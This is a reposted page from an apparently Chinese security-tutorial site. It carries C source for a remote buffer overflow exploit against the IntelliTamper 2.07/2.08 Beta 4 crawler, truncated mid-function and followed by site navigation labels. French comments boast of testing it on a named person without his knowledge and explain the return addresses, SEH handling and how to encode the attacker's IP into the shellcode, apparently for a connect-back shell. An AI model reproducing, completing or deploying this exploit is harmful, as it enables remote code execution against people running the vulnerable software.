IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit
发布时间:2016-01-30 来源:查字典编辑
摘要:/********************************************************************/...

/********************************************************************/

/* [Crpt] IntelliTamper v2.07/2.08 Beta 4 sploit by kralor [Crpt] */

/********************************************************************/

/* NO MORE */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/* CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL CONFIDENTIAL */

/********************************************************************/

/* Exploit testé sur Jef_FR a son insu, ca marche bien a 100% :) */

/* Jef_FR pourra vous le confirmer hihi :P */

/* Au fait c'est universel pcq si la personne utilise la v2.08beta4 */

/* ben y'a du SEH alors le premier lien qui est fait plus petit */

/* pour la v2.07 ca fera pas planter, ca sera pris en charge par le */

/* programme.. Bref que dire de plus... Si ce n'est qu'on peut p-e */

/* jumper direct sans aller a un jmp ebx, en utilisant 0x00F1FFDC */

/* j'ai remarqué que sur les deux versions une fois que ca crash */

/* (je catch l'exception meme si le prog a du SEH!) ebx pointe vers */

/* cet offset toujours le meme (~fin de notre buffer). J'ai pas */

/* regardé sur d'autres plateformes, vu que j'ai deja des ret */

/* (jmp ebx) qui vont tres bien :) c'est tout les poulets, enjoy. */

/* */

/* P.S: Faut regarder que votre IP xoré par 0x98 donne pas un bad */

/* opcode du genre < > " r n ... C'est pas sorcier a coder :) */

/********************************************************************/

/* informations: , irc undernet #coromputer */

/********************************************************************/

#include

#include

#include

#ifdef _WIN32

#include

#pragma comment(lib, "ws2_32")

#else

#include

#endif

#define SIZEOF 14448 /* IntelliTamper v2.08 Beta 4 AND v2.07

* for v2.07 it isn't this size 'cause

* there's a *missing* in RET_ADDR2

* so it cuts the size.

*/

#define SCOFFSET 10000 /* IntelliTamper v2.08 Beta 4 */

#define RET_POS SIZEOF-4

#define RET_ADDR 0x004368C4

#define SCOFFSET2 100 /* IntelliTamper v2.07 */

#define RET_POS2 6832

#define RET_ADDR2 0x00437224

#define u_short unsigned short

#define u_char unsigned char

#define HOP 0xd9 /* host opcode */

#define POP 0xda /* port opcode */

#define BEGIN "rnrn"

#define END "rn"

int set_sc(char *host,unsigned long port, char *sc)

{

unsigned long ip,p;

unsigned int i;

ip=inet_addr(host)^0x98989898;

p=htons((u_short)port);

p=p

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新电脑安全教程学习
热门电脑安全教程学习
电脑子分类